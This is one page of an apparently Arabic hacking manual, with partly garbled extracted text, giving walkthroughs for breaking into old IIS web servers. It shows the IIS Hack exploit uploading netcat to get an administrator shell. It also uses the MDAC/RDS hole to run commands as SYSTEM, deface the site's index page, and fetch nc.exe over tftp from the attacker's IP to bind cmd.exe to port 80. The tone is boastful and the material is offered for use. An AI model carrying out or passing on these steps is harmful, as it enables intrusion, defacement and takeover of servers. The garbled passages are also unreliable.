Page 144 - بسم الله الرحمن الرحيم
P. 144

‫‪- : IIS Hack.exe‬‬
                                                                                        ‫‪----------------‬‬

‫اكتشف ختبراء المن في شركة ‪ eEye‬ثغرة امنية تصسمح لك بتحميل نسخه ذكية من ‪ nc.exe‬وجهعلها تصنصت‬
                                                                                       ‫على المنفذ ‪.. 80‬‬

                              ‫وهذا سيعطيك سطر اوامر ‪ cmde.exe‬مع امتيازات ‪. Administrator‬‬
    ‫بامكانك انزال ‪ NC.exe‬و ‪ IIS Hack.exe‬من الموقع ‪. /http://www.technotronic.com‬‬

                                                   ‫ويجب تصشغيل ويب سيرفر في جههازك قبل تصنفيذ الثغرة ‪..‬‬
    ‫قم بنسخ اداة ‪ nc.exe‬وضعها في الدليل الرئيسي للويب سيرفر لديك )في اباتصشي ‪ (Htdocs‬وفي ‪IIS‬‬

                                                                                    ‫الدليل ‪. wwwroot‬‬
                                                                        ‫ثم قم بتشغيل ‪: IISHack.exe‬‬
                     ‫‪c:\>iishack.exe http://www.target.com/ 80 your_IP/ncx.exe‬‬
                                                                       ‫وبعد اتصما‪.‬م الخطوة السابقة بنجا ح ‪:‬‬
                               ‫‪ /c:\>nc http://www.target.com‬وستجد امامك ‪eGG SheLL‬‬

                       ‫ملحظة ‪ :‬تصعمل هذه الثغرة على سيرفرات ‪ IIS4.0‬فقط ))اذا لم يتم تصركيب الرقعه(( ‪.‬‬

    ‫‪do you want me to explain what to do next, hey common you must be‬‬
                                                                                              ‫‪kidding‬‬

                                                                                           ‫‪....hehe...‬‬

                                                                                       ‫‪-----------------‬‬
                                                                                   ‫‪-: MDAC = RDS‬‬

                                                                                       ‫‪-----------------‬‬
                         ‫اعتقد انها ثغرة قديمة قليل )لكني ما زلت ارى ان ‪ %40‬من المواقع تصعاني منها ‪..‬‬
 ‫تصسمح لك هذه الثغرة بتشغيل اوامرك على النظا‪.‬م الهدف بشكل محلي ‪ ..‬سيتم تصشغيل وامرك بصفتك مستخد‪.‬م‬
 ‫‪ SYSTEM‬اي بصلحيات مدير النظا‪.‬م ‪ ..‬على العمو‪.‬م اذا اردت معرفة اذا ما كان النظا‪.‬م مصابا بهذه الثغرة‬

                                                                                                  ‫ا‪.‬م ل ‪..‬‬
 ‫قم اول بالتصصال بالنظا‪.‬م الهدف ‪ c:\>nc -nw -w 2 http://www.host.com/ 80 :‬ثم قم بارسال‬

                                                      ‫المر ‪GET /msadc/msadcs.dll HTTP :‬‬
           ‫فإذا كان الرد ‪ application/x_varg :‬فهذا يعني ان النظا‪.‬م مصاب )) اذا لم يتم تصرقيعه (( ‪..‬‬
             ‫بامكانك ايجاد سكربتات بيرل تصسهل عليك العمل في هذا الموقع ‪www.wiretrip.net/rfp :‬‬

                                                                   ‫‪(( mdac.pl - msadc2.pl )) v‬‬
                                                                     ‫‪c:\> mdac.pl -h host.com‬‬

   ‫‪Please type the NT commandline you want to run (cmd /c assumed):\n‬‬
                                                                                               ‫‪cmd /c‬‬

         ‫إذا اردت تصغيير الصفحه الرئيسية ما عليك ال تصنفيذ المر ‪echo hacked by me hehe > :‬‬
                                                            ‫‪C:\inetpub\wwwroot\index.htm‬‬

         ‫وإذا أردنا احكا‪.‬م السيطرة على الموقع بامكاننا تصحميل ‪ Hacker's Swiss knife Army‬اقصد‬
                                                                           ‫‪ Nc.exe‬بواسطة هذا المر ‪:‬‬

        ‫‪systemroot%&&tftp -i YourIP GET nc.exe&&del ftptmp&& attrib -r%‬‬
                                                   ‫‪nc.exe&&nc.exe -l -p 80 -t -e cmd.exe‬‬

                                        ‫)) قم بقراءة المر من اليسار الى اليمين لتتمكن من قراءتصه جهيدا ((‬
    ‫بعدها قم بالتصصال بالنظا‪.‬م الهدف على المنفذ ‪ 80‬وستجد سطر اوامر مع امتيازات ‪. Administrator‬‬

                                                                  ‫‪--------------------------------------‬‬
                                                        ‫‪-: Codebrws.asp & Showcode.asp‬‬

                                                                  ‫‪--------------------------------------‬‬
‫الملفان عبارة عن قاريء ملفات ‪ ASP‬يأتصي مع ‪ IIS‬ولكنه ل يأتصي محمل افتراضيا بل يجب على مدير النظا‪.‬م‬

                                                  ‫‪144‬‬
   139   140   141   142   143   144   145   146   147   148   149